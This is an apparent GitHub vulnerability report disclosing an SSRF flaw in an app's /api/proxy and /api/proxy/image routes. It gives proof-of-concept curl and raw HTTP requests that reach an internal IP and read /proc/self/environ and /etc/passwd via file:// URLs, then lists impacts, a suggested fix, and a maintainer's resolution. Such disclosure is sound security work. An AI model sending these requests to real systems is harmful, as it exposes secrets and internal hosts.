[BUG] Security Vulnerability

[0x1f]

Description

The GET function in the components apps/sim/app/api/proxy/route.ts and apps/sim/app/api/proxy/image/route.ts does not filter and judge the parameters in the request, resulting in an SSRF security issue.

POC

• Request

curl "http://localhost:3000/api/proxy?url=http://172.17.0.1:9999&method=POST&body=1&header.12=test12&header.Content-Type=12222222222222" 

• Response

• Request

 curl "http://localhost:3000/api/proxy/image?url=https://example.com"     

• Response

Since the bun component supports file protocol access, the vulnerability can be used to access local files.

• Request

 curl "http://localhost:3000/api/proxy?url=file:///proc/self/environ&method=POST"    

• Response

• Request

GET /api/proxy/image?url=file:///etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.105 Safari/537.36 Vivaldi/1.0.162.9
Accept: */*
Host: localhost:3000

• Response

Impact

• Read cloud metadata to obtain credentials and even take over cloud infrastructure.
• Access intranet systems .
• Read local file information.

Suggestions

Before calling fetch, create a filter to determine whether the request URL is legal and disable the file protocol to access local files (determine whether the URL field starts with http or https, not discard the request).

[waleedlatif1]

resolved in #1149